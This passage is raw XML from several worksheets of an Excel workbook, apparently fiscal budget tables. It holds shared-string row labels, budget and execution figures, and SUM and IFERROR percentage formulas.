      <c r="B116" s="1190" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="117" spans="2:2">
      <c r="B117" s="1190" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="118" spans="2:2">
      <c r="B118" s="1190" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="119" spans="2:2">
      <c r="B119" s="1190" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="120" spans="2:2">
      <c r="B120" s="1190" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="121" spans="2:2">
      <c r="B121" s="1190" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="122" spans="2:2">
      <c r="B122" s="1190" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="123" spans="2:2">
      <c r="B123" s="1190" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="124" spans="2:2">
      <c r="B124" s="1190" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="125" spans="2:2">
      <c r="B125" s="1190" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="126" spans="2:2">
      <c r="B126" s="1190" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="127" spans="2:2">
      <c r="B127" s="1190" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="128" spans="2:2">
      <c r="B128" s="1190" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="129" spans="2:2">
      <c r="B129" s="1190" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="130" spans="2:2">
      <c r="B130" s="1190" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="131" spans="2:2">
      <c r="B131" s="1190" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="132" spans="2:2">
      <c r="B132" s="1190" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="133" spans="2:2">
      <c r="B133" s="1190" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="134" spans="2:2">
      <c r="B134" s="1190" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="135" spans="2:2">
      <c r="B135" s="1190" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="136" spans="2:2">
      <c r="B136" s="1190" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="137" spans="2:2">
      <c r="B137" s="1190" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="138" spans="2:2">
      <c r="B138" s="1190" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="139" spans="2:2">
      <c r="B139" s="1190" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="140" spans="2:2">
      <c r="B140" s="1190" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="141" spans="2:2">
      <c r="B141" s="1190" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="142" spans="2:2">
      <c r="B142" s="1190" t="s">
        <v>205</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:B23"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D18" sqref="D18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="1"/>
  <cols>
    <col min="1" max="1" width="58.4259259259259" style="63" customWidth="1"/>
    <col min="2" max="2" width="25.8425925925926" style="65" customWidth="1"/>
    <col min="3" max="16384" width="10.2777777777778" style="63"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:2">
      <c r="A1" s="1138" t="s">
        <v>509</v>
      </c>
      <c r="B1" s="1131"/>
    </row>
    <row r="2" ht="51" customHeight="1" spans="1:2">
      <c r="A2" s="150" t="s">
        <v>510</v>
      </c>
      <c r="B2" s="150"/>
    </row>
    <row r="3" ht="18" customHeight="1" spans="1:2">
      <c r="A3" s="1132" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="1132"/>
    </row>
    <row r="4" ht="30.95" customHeight="1" spans="1:2">
      <c r="A4" s="972" t="s">
        <v>457</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>458</v>
      </c>
    </row>
    <row r="5" ht="30" customHeight="1" spans="1:2">
      <c r="A5" s="1139" t="s">
        <v>511</v>
      </c>
      <c r="B5" s="1006">
        <f>SUM(B6:B18)</f>
        <v>33092</v>
      </c>
    </row>
    <row r="6" ht="30" customHeight="1" spans="1:2">
      <c r="A6" s="1140" t="s">
        <v>460</v>
      </c>
      <c r="B6" s="1141">
        <v>4</v>
      </c>
    </row>
    <row r="7" ht="30" customHeight="1" spans="1:2">
      <c r="A7" s="1134" t="s">
        <v>461</v>
      </c>
      <c r="B7" s="1141">
        <v>1559</v>
      </c>
    </row>
    <row r="8" ht="30" customHeight="1" spans="1:2">
      <c r="A8" s="1134" t="s">
        <v>462</v>
      </c>
      <c r="B8" s="1141">
        <v>14105</v>
      </c>
    </row>
    <row r="9" ht="30" customHeight="1" spans="1:2">
      <c r="A9" s="1134" t="s">
        <v>464</v>
      </c>
      <c r="B9" s="1141">
        <v>7</v>
      </c>
    </row>
    <row r="10" ht="30" customHeight="1" spans="1:2">
      <c r="A10" s="1134" t="s">
        <v>466</v>
      </c>
      <c r="B10" s="1141">
        <v>5</v>
      </c>
    </row>
    <row r="11" ht="30" customHeight="1" spans="1:2">
      <c r="A11" s="1134" t="s">
        <v>468</v>
      </c>
      <c r="B11" s="1141">
        <v>5259</v>
      </c>
    </row>
    <row r="12" ht="30" customHeight="1" spans="1:2">
      <c r="A12" s="1134" t="s">
        <v>470</v>
      </c>
      <c r="B12" s="1141">
        <v>11</v>
      </c>
    </row>
    <row r="13" ht="30" customHeight="1" spans="1:2">
      <c r="A13" s="1134" t="s">
        <v>471</v>
      </c>
      <c r="B13" s="1141">
        <v>40</v>
      </c>
    </row>
    <row r="14" ht="30" customHeight="1" spans="1:2">
      <c r="A14" s="1134" t="s">
        <v>473</v>
      </c>
      <c r="B14" s="1141">
        <v>7337</v>
      </c>
    </row>
    <row r="15" ht="30" customHeight="1" spans="1:2">
      <c r="A15" s="1134" t="s">
        <v>474</v>
      </c>
      <c r="B15" s="1141">
        <v>2025</v>
      </c>
    </row>
    <row r="16" ht="30" customHeight="1" spans="1:2">
      <c r="A16" s="1134" t="s">
        <v>476</v>
      </c>
      <c r="B16" s="1141">
        <v>577</v>
      </c>
    </row>
    <row r="17" ht="30" customHeight="1" spans="1:2">
      <c r="A17" s="1134" t="s">
        <v>477</v>
      </c>
      <c r="B17" s="1141">
        <v>80</v>
      </c>
    </row>
    <row r="18" ht="30" customHeight="1" spans="1:2">
      <c r="A18" s="1134" t="s">
        <v>481</v>
      </c>
      <c r="B18" s="1141">
        <v>2083</v>
      </c>
    </row>
    <row r="19" ht="30" customHeight="1" spans="1:2">
      <c r="A19" s="1136" t="s">
        <v>489</v>
      </c>
      <c r="B19" s="1137">
        <f>B5</f>
        <v>33092</v>
      </c>
    </row>
    <row r="20" ht="30" customHeight="1"/>
    <row r="21" ht="30" customHeight="1"/>
    <row r="22" ht="30" customHeight="1"/>
    <row r="23" ht="30" customHeight="1"/>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A3:B3"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:B14"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A1" sqref="A1:B1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="1"/>
  <cols>
    <col min="1" max="1" width="52.5740740740741" style="63" customWidth="1"/>
    <col min="2" max="2" width="25.8425925925926" style="65" customWidth="1"/>
    <col min="3" max="16384" width="10.2777777777778" style="63"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:2">
      <c r="A1" s="1130" t="s">
        <v>512</v>
      </c>
      <c r="B1" s="1131"/>
    </row>
    <row r="2" ht="38.1" customHeight="1" spans="1:2">
      <c r="A2" s="150" t="s">
        <v>513</v>
      </c>
      <c r="B2" s="150"/>
    </row>
    <row r="3" ht="18" customHeight="1" spans="1:2">
      <c r="A3" s="1132" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="1133"/>
    </row>
    <row r="4" ht="32.1" customHeight="1" spans="1:2">
      <c r="A4" s="972" t="s">
        <v>457</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>458</v>
      </c>
    </row>
    <row r="5" ht="32.1" customHeight="1" spans="1:2">
      <c r="A5" s="1134" t="s">
        <v>494</v>
      </c>
      <c r="B5" s="1135">
        <v>326</v>
      </c>
    </row>
    <row r="6" ht="32.1" customHeight="1" spans="1:2">
      <c r="A6" s="1134" t="s">
        <v>495</v>
      </c>
      <c r="B6" s="1135">
        <v>1729</v>
      </c>
    </row>
    <row r="7" ht="32.1" customHeight="1" spans="1:2">
      <c r="A7" s="1134" t="s">
        <v>499</v>
      </c>
      <c r="B7" s="1135">
        <v>22</v>
      </c>
    </row>
    <row r="8" ht="32.1" customHeight="1" spans="1:2">
      <c r="A8" s="1134" t="s">
        <v>501</v>
      </c>
      <c r="B8" s="1135">
        <v>13</v>
      </c>
    </row>
    <row r="9" ht="32.1" customHeight="1" spans="1:2">
      <c r="A9" s="1134" t="s">
        <v>505</v>
      </c>
      <c r="B9" s="1135">
        <v>60</v>
      </c>
    </row>
    <row r="10" ht="32.1" customHeight="1" spans="1:2">
      <c r="A10" s="1134" t="s">
        <v>504</v>
      </c>
      <c r="B10" s="1135">
        <v>164</v>
      </c>
    </row>
    <row r="11" ht="32.1" customHeight="1" spans="1:2">
      <c r="A11" s="1134" t="s">
        <v>514</v>
      </c>
      <c r="B11" s="1135">
        <v>108</v>
      </c>
    </row>
    <row r="12" ht="32.1" customHeight="1" spans="1:2">
      <c r="A12" s="1134" t="s">
        <v>500</v>
      </c>
      <c r="B12" s="1135">
        <v>884</v>
      </c>
    </row>
    <row r="13" ht="32.1" customHeight="1" spans="1:2">
      <c r="A13" s="1134" t="s">
        <v>508</v>
      </c>
      <c r="B13" s="1135">
        <v>629</v>
      </c>
    </row>
    <row r="14" ht="27" customHeight="1" spans="1:2">
      <c r="A14" s="1136" t="s">
        <v>489</v>
      </c>
      <c r="B14" s="1137">
        <f>SUM(B5:B13)</f>
        <v>3935</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A3:B3"/>
  </mergeCells>
  <pageMargins left="0.944444444444444" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>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6"/>
  </sheetPr>
  <dimension ref="A1:F31"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B13" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A4" sqref="A4:A5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="44.7407407407407" style="968" customWidth="1"/>
    <col min="2" max="4" width="10.7222222222222" style="968" customWidth="1"/>
    <col min="5" max="5" width="10.7222222222222" style="986" customWidth="1"/>
    <col min="6" max="6" width="10.7222222222222" style="1027" customWidth="1"/>
    <col min="7" max="16317" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" spans="1:1">
      <c r="A1" s="858" t="s">
        <v>515</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:6">
      <c r="A2" s="998" t="s">
        <v>516</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
      <c r="E2" s="998"/>
      <c r="F2" s="998"/>
    </row>
    <row r="3" spans="5:6">
      <c r="E3" s="1122" t="s">
        <v>373</v>
      </c>
      <c r="F3" s="1122"/>
    </row>
    <row r="4" ht="18.95" customHeight="1" spans="1:6">
      <c r="A4" s="987" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="1117" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="1118" t="s">
        <v>518</v>
      </c>
      <c r="D4" s="971" t="s">
        <v>519</v>
      </c>
      <c r="E4" s="1118"/>
      <c r="F4" s="1117"/>
    </row>
    <row r="5" ht="24" spans="1:6">
      <c r="A5" s="1123"/>
      <c r="B5" s="1117"/>
      <c r="C5" s="1118"/>
      <c r="D5" s="971" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="971" t="s">
        <v>379</v>
      </c>
      <c r="F5" s="972" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="6" ht="18" customHeight="1" spans="1:6">
      <c r="A6" s="1063" t="s">
        <v>520</v>
      </c>
      <c r="B6" s="1021"/>
      <c r="C6" s="1114"/>
      <c r="D6" s="1028"/>
      <c r="E6" s="1124"/>
      <c r="F6" s="1125"/>
    </row>
    <row r="7" ht="18" customHeight="1" spans="1:6">
      <c r="A7" s="1063" t="s">
        <v>521</v>
      </c>
      <c r="B7" s="1021"/>
      <c r="C7" s="1114"/>
      <c r="D7" s="977"/>
      <c r="E7" s="777"/>
      <c r="F7" s="777"/>
    </row>
    <row r="8" ht="18" customHeight="1" spans="1:6">
      <c r="A8" s="1063" t="s">
        <v>522</v>
      </c>
      <c r="B8" s="1021"/>
      <c r="C8" s="1114"/>
      <c r="D8" s="977"/>
      <c r="E8" s="777"/>
      <c r="F8" s="777"/>
    </row>
    <row r="9" ht="18" customHeight="1" spans="1:6">
      <c r="A9" s="1063" t="s">
        <v>523</v>
      </c>
      <c r="B9" s="1021"/>
      <c r="C9" s="1114"/>
      <c r="D9" s="977"/>
      <c r="E9" s="777"/>
      <c r="F9" s="777"/>
    </row>
    <row r="10" ht="18" customHeight="1" spans="1:6">
      <c r="A10" s="1063" t="s">
        <v>524</v>
      </c>
      <c r="B10" s="1114"/>
      <c r="C10" s="979"/>
      <c r="D10" s="977"/>
      <c r="E10" s="777"/>
      <c r="F10" s="777"/>
    </row>
    <row r="11" ht="18" customHeight="1" spans="1:6">
      <c r="A11" s="1063" t="s">
        <v>525</v>
      </c>
      <c r="B11" s="1114"/>
      <c r="C11" s="979"/>
      <c r="D11" s="977"/>
      <c r="E11" s="777"/>
      <c r="F11" s="777"/>
    </row>
    <row r="12" ht="18" customHeight="1" spans="1:6">
      <c r="A12" s="1063" t="s">
        <v>526</v>
      </c>
      <c r="B12" s="568">
        <v>165159</v>
      </c>
      <c r="C12" s="979">
        <v>111700</v>
      </c>
      <c r="D12" s="977">
        <v>119340</v>
      </c>
      <c r="E12" s="777">
        <f>IFERROR(D12/C12*100,"-")</f>
        <v>106.839749328559</v>
      </c>
      <c r="F12" s="777">
        <f>IFERROR((D12-B12)/B12*100,"-")</f>
        <v>-27.7423573647213</v>
      </c>
    </row>
    <row r="13" ht="18" customHeight="1" spans="1:6">
      <c r="A13" s="1063" t="s">
        <v>527</v>
      </c>
      <c r="B13" s="1126"/>
      <c r="C13" s="979"/>
      <c r="D13" s="977"/>
      <c r="E13" s="777"/>
      <c r="F13" s="777"/>
    </row>
    <row r="14" ht="18" customHeight="1" spans="1:6">
      <c r="A14" s="1063" t="s">
        <v>528</v>
      </c>
      <c r="B14" s="568">
        <v>1458</v>
      </c>
      <c r="C14" s="979">
        <v>1400</v>
      </c>
      <c r="D14" s="977">
        <v>1476</v>
      </c>
      <c r="E14" s="777">
        <f>IFERROR(D14/C14*100,"-")</f>
        <v>105.428571428571</v>
      </c>
      <c r="F14" s="777">
        <f>IFERROR((D14-B14)/B14*100,"-")</f>
        <v>1.23456790123457</v>
      </c>
    </row>
    <row r="15" ht="18" customHeight="1" spans="1:6">
      <c r="A15" s="1063" t="s">
        <v>529</v>
      </c>
      <c r="B15" s="568">
        <v>8830</v>
      </c>
      <c r="C15" s="979">
        <v>4971</v>
      </c>
      <c r="D15" s="977">
        <v>6306</v>
      </c>
      <c r="E15" s="777">
        <f>IFERROR(D15/C15*100,"-")</f>
        <v>126.855763427882</v>
      </c>
      <c r="F15" s="777">
        <f>IFERROR((D15-B15)/B15*100,"-")</f>
        <v>-28.5843714609287</v>
      </c>
    </row>
    <row r="16" ht="18" customHeight="1" spans="1:6">
      <c r="A16" s="1063" t="s">
        <v>530</v>
      </c>
      <c r="B16" s="1126"/>
      <c r="C16" s="979"/>
      <c r="D16" s="977"/>
      <c r="E16" s="777"/>
      <c r="F16" s="777"/>
    </row>
    <row r="17" ht="18" customHeight="1" spans="1:6">
      <c r="A17" s="1063" t="s">
        <v>531</v>
      </c>
      <c r="B17" s="1126"/>
      <c r="C17" s="979"/>
      <c r="D17" s="977"/>
      <c r="E17" s="777"/>
      <c r="F17" s="777"/>
    </row>
    <row r="18" ht="18" customHeight="1" spans="1:6">
      <c r="A18" s="1063" t="s">
        <v>532</v>
      </c>
      <c r="B18" s="1126"/>
      <c r="C18" s="979"/>
      <c r="D18" s="977"/>
      <c r="E18" s="777"/>
      <c r="F18" s="777"/>
    </row>
    <row r="19" ht="18" customHeight="1" spans="1:6">
      <c r="A19" s="1063" t="s">
        <v>533</v>
      </c>
      <c r="B19" s="568">
        <v>1981</v>
      </c>
      <c r="C19" s="979">
        <v>2000</v>
      </c>
      <c r="D19" s="977">
        <v>2036</v>
      </c>
      <c r="E19" s="777">
        <f>IFERROR(D19/C19*100,"-")</f>
        <v>101.8</v>
      </c>
      <c r="F19" s="777">
        <f>IFERROR((D19-B19)/B19*100,"-")</f>
        <v>2.776375567895</v>
      </c>
    </row>
    <row r="20" ht="18" customHeight="1" spans="1:6">
      <c r="A20" s="428" t="s">
        <v>534</v>
      </c>
      <c r="B20" s="1126"/>
      <c r="C20" s="979"/>
      <c r="D20" s="977"/>
      <c r="E20" s="777"/>
      <c r="F20" s="777"/>
    </row>
    <row r="21" ht="18" customHeight="1" spans="1:6">
      <c r="A21" s="1063" t="s">
        <v>535</v>
      </c>
      <c r="B21" s="1126"/>
      <c r="C21" s="979"/>
      <c r="D21" s="977"/>
      <c r="E21" s="777"/>
      <c r="F21" s="777"/>
    </row>
    <row r="22" ht="18" customHeight="1" spans="1:6">
      <c r="A22" s="1063" t="s">
        <v>536</v>
      </c>
      <c r="B22" s="568">
        <v>7812</v>
      </c>
      <c r="C22" s="979">
        <v>10597</v>
      </c>
      <c r="D22" s="977">
        <v>11663</v>
      </c>
      <c r="E22" s="777">
        <f>IFERROR(D22/C22*100,"-")</f>
        <v>110.059450787959</v>
      </c>
      <c r="F22" s="777">
        <f t="shared" ref="F20:F31" si="0">IFERROR((D22-B22)/B22*100,"-")</f>
        <v>49.2959549411162</v>
      </c>
    </row>
    <row r="23" ht="18" customHeight="1" spans="1:6">
      <c r="A23" s="1067" t="s">
        <v>537</v>
      </c>
      <c r="B23" s="1127">
        <f>SUM(B10:B22)</f>
        <v>185240</v>
      </c>
      <c r="C23" s="980">
        <f>SUM(C8:C22)</f>
        <v>130668</v>
      </c>
      <c r="D23" s="981">
        <f>SUM(D8:D22)</f>
        <v>140821</v>
      </c>
      <c r="E23" s="1086">
        <f t="shared" ref="E23:E28" si="1">IFERROR(D23/C23*100,"-")</f>
        <v>107.770073774757</v>
      </c>
      <c r="F23" s="1086">
        <f t="shared" si="0"/>
        <v>-23.9791621679983</v>
      </c>
    </row>
    <row r="24" ht="18" customHeight="1" spans="1:6">
      <c r="A24" s="1063" t="s">
        <v>538</v>
      </c>
      <c r="B24" s="568">
        <f>SUM(B25:B26)</f>
        <v>243470</v>
      </c>
      <c r="C24" s="1128">
        <f>SUM(C25:C26)</f>
        <v>199500</v>
      </c>
      <c r="D24" s="567">
        <f>SUM(D25:D26)</f>
        <v>199500</v>
      </c>
      <c r="E24" s="777">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="F24" s="777">
        <f t="shared" si="0"/>
        <v>-18.0597198833532</v>
      </c>
    </row>
    <row r="25" ht="18" customHeight="1" spans="1:6">
      <c r="A25" s="1072" t="s">
        <v>539</v>
      </c>
      <c r="B25" s="568">
        <v>153300</v>
      </c>
      <c r="C25" s="979">
        <v>140500</v>
      </c>
      <c r="D25" s="977">
        <v>140500</v>
      </c>
      <c r="E25" s="777">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="F25" s="777">
        <f t="shared" si="0"/>
        <v>-8.34964122635355</v>
      </c>
    </row>
    <row r="26" ht="18" customHeight="1" spans="1:6">
      <c r="A26" s="1072" t="s">
        <v>540</v>
      </c>
      <c r="B26" s="568">
        <v>90170</v>
      </c>
      <c r="C26" s="979">
        <v>59000</v>
      </c>
      <c r="D26" s="977">
        <v>59000</v>
      </c>
      <c r="E26" s="777">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="F26" s="777">
        <f t="shared" si="0"/>
        <v>-34.5680381501608</v>
      </c>
    </row>
    <row r="27" ht="18" customHeight="1" spans="1:6">
      <c r="A27" s="1063" t="s">
        <v>541</v>
      </c>
      <c r="B27" s="568">
        <f>B28+B29+B30</f>
        <v>36870</v>
      </c>
      <c r="C27" s="979">
        <f>SUM(C28:C30)</f>
        <v>76966</v>
      </c>
      <c r="D27" s="977">
        <f>SUM(D28:D30)</f>
        <v>76966</v>
      </c>
      <c r="E27" s="777">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="F27" s="777">
        <f t="shared" si="0"/>
        <v>108.749660970979</v>
      </c>
    </row>
    <row r="28" ht="18" customHeight="1" spans="1:6">
      <c r="A28" s="1072" t="s">
        <v>542</v>
      </c>
      <c r="B28" s="568">
        <v>5969</v>
      </c>
      <c r="C28" s="979">
        <v>8549</v>
      </c>
      <c r="D28" s="977">
        <v>8549</v>
      </c>
      <c r="E28" s="777">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="F28" s="777">
        <f t="shared" si="0"/>
        <v>43.2233204891942</v>
      </c>
    </row>
    <row r="29" ht="18" customHeight="1" spans="1:6">
      <c r="A29" s="1072" t="s">
        <v>543</v>
      </c>
      <c r="B29" s="568"/>
      <c r="C29" s="979"/>
      <c r="D29" s="977"/>
      <c r="E29" s="777"/>
      <c r="F29" s="777"/>
    </row>
    <row r="30" ht="18" customHeight="1" spans="1:6">
      <c r="A30" s="1072" t="s">
        <v>544</v>
      </c>
      <c r="B30" s="568">
        <v>30901</v>
      </c>
      <c r="C30" s="979">
        <v>68417</v>
      </c>
      <c r="D30" s="977">
        <v>68417</v>
      </c>
      <c r="E30" s="777">
        <f>IFERROR(D30/C30*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F30" s="777">
        <f t="shared" si="0"/>
        <v>121.407074204718</v>
      </c>
    </row>
    <row r="31" ht="18" customHeight="1" spans="1:6">
      <c r="A31" s="984" t="s">
        <v>417</v>
      </c>
      <c r="B31" s="1033">
        <f>B23+B24+B27</f>
        <v>465580</v>
      </c>
      <c r="C31" s="1129">
        <f>SUM(C23,C24,C27)</f>
        <v>407134</v>
      </c>
      <c r="D31" s="1034">
        <f>SUM(D23,D24,D27)</f>
        <v>417287</v>
      </c>
      <c r="E31" s="782">
        <f>IFERROR(D31/C31*100,"-")</f>
        <v>102.493773548758</v>
      </c>
      <c r="F31" s="782">
        <f t="shared" si="0"/>
        <v>-10.3726534644959</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="E3:F3"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.511805555555556" right="0.432638888888889" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:F53"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="7" topLeftCell="B41" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="F65" sqref="F65"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="58.4537037037037" style="1115" customWidth="1"/>
    <col min="2" max="2" width="9.84259259259259" style="968" customWidth="1"/>
    <col min="3" max="3" width="10.8425925925926" style="968" customWidth="1"/>
    <col min="4" max="6" width="9.84259259259259" style="968" customWidth="1"/>
    <col min="7" max="7" width="10.4259259259259" style="968" customWidth="1"/>
    <col min="8" max="16384" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" spans="1:6">
      <c r="A1" s="1116" t="s">
        <v>545</v>
      </c>
      <c r="E1" s="986"/>
      <c r="F1" s="986"/>
    </row>
    <row r="2" ht="26.4" spans="1:6">
      <c r="A2" s="969" t="s">
        <v>546</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
      <c r="E2" s="998"/>
      <c r="F2" s="998"/>
    </row>
    <row r="3" spans="5:6">
      <c r="E3" s="986"/>
      <c r="F3" s="1112" t="s">
        <v>547</v>
      </c>
    </row>
    <row r="4" ht="35" customHeight="1" spans="1:6">
      <c r="A4" s="972" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="972" t="s">
        <v>518</v>
      </c>
      <c r="D4" s="1117" t="s">
        <v>519</v>
      </c>
      <c r="E4" s="972"/>
      <c r="F4" s="972"/>
    </row>
    <row r="5" ht="35" customHeight="1" spans="1:6">
      <c r="A5" s="1061"/>
      <c r="B5" s="972"/>
      <c r="C5" s="972"/>
      <c r="D5" s="1118" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="972" t="s">
        <v>379</v>
      </c>
      <c r="F5" s="1117" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="6" ht="18" customHeight="1" spans="1:6">
      <c r="A6" s="983" t="s">
        <v>548</v>
      </c>
      <c r="B6" s="1028"/>
      <c r="C6" s="1021"/>
      <c r="D6" s="1028"/>
      <c r="E6" s="1119"/>
      <c r="F6" s="1119"/>
    </row>
    <row r="7" ht="18" customHeight="1" spans="1:6">
      <c r="A7" s="983" t="s">
        <v>549</v>
      </c>
      <c r="B7" s="1120"/>
      <c r="C7" s="1022">
        <f>SUM(C8:C10)</f>
        <v>8</v>
      </c>
      <c r="D7" s="1022">
        <f>SUM(D8:D10)</f>
        <v>8</v>
      </c>
      <c r="E7" s="777">
        <f>IFERROR(D7/C7*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F7" s="777"/>
    </row>
    <row r="8" ht="18" customHeight="1" spans="1:6">
      <c r="A8" s="974" t="s">
        <v>550</v>
      </c>
      <c r="B8" s="839"/>
      <c r="C8" s="1022">
        <v>8</v>
      </c>
      <c r="D8" s="977">
        <v>8</v>
      </c>
      <c r="E8" s="777">
        <f>IFERROR(D8/C8*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F8" s="777"/>
    </row>
    <row r="9" ht="18" customHeight="1" spans="1:6">
      <c r="A9" s="974" t="s">
        <v>551</v>
      </c>
      <c r="B9" s="1022"/>
      <c r="C9" s="1022"/>
      <c r="D9" s="977"/>
      <c r="E9" s="777"/>
      <c r="F9" s="777"/>
    </row>
    <row r="10" ht="18" customHeight="1" spans="1:6">
      <c r="A10" s="974" t="s">
        <v>552</v>
      </c>
      <c r="B10" s="1022"/>
      <c r="C10" s="1022"/>
      <c r="D10" s="977"/>
      <c r="E10" s="777"/>
      <c r="F10" s="777"/>
    </row>
    <row r="11" ht="18" customHeight="1" spans="1:6">
      <c r="A11" s="974" t="s">
        <v>553</v>
      </c>
      <c r="B11" s="1022"/>
      <c r="C11" s="1022"/>
      <c r="D11" s="977"/>
      <c r="E11" s="777"/>
      <c r="F11" s="777"/>
    </row>
    <row r="12" ht="18" customHeight="1" spans="1:6">
      <c r="A12" s="974" t="s">
        <v>554</v>
      </c>
      <c r="B12" s="1022"/>
      <c r="C12" s="1022"/>
      <c r="D12" s="977"/>
      <c r="E12" s="777"/>
      <c r="F12" s="777"/>
    </row>
    <row r="13" ht="18" customHeight="1" spans="1:6">
      <c r="A13" s="974" t="s">
        <v>555</v>
      </c>
      <c r="B13" s="1022"/>
      <c r="C13" s="1022"/>
      <c r="D13" s="977"/>
      <c r="E13" s="777"/>
      <c r="F13" s="777"/>
    </row>
    <row r="14" ht="18" customHeight="1" spans="1:6">
      <c r="A14" s="974" t="s">
        <v>556</v>
      </c>
      <c r="B14" s="1022">
        <f>SUM(B15:B25)</f>
        <v>231890</v>
      </c>
      <c r="C14" s="1022">
        <f>SUM(C15:C25)</f>
        <v>144065</v>
      </c>
      <c r="D14" s="1022">
        <f>SUM(D15:D25)</f>
        <v>105072</v>
      </c>
      <c r="E14" s="777">
        <f>IFERROR(D14/C14*100,"-")</f>
        <v>72.9337451844654</v>
      </c>
      <c r="F14" s="777">
        <f>IFERROR((D14-B14)/B14*100,"-")</f>
        <v>-54.6888610979344</v>
      </c>
    </row>
    <row r="15" ht="18" customHeight="1" spans="1:6">
      <c r="A15" s="974" t="s">
        <v>557</v>
      </c>
      <c r="B15" s="839">
        <v>138179</v>
      </c>
      <c r="C15" s="1022">
        <v>70220</v>
      </c>
      <c r="D15" s="977">
        <v>83090</v>
      </c>
      <c r="E15" s="777">
        <f>IFERROR(D15/C15*100,"-")</f>
        <v>118.328111649103</v>
      </c>
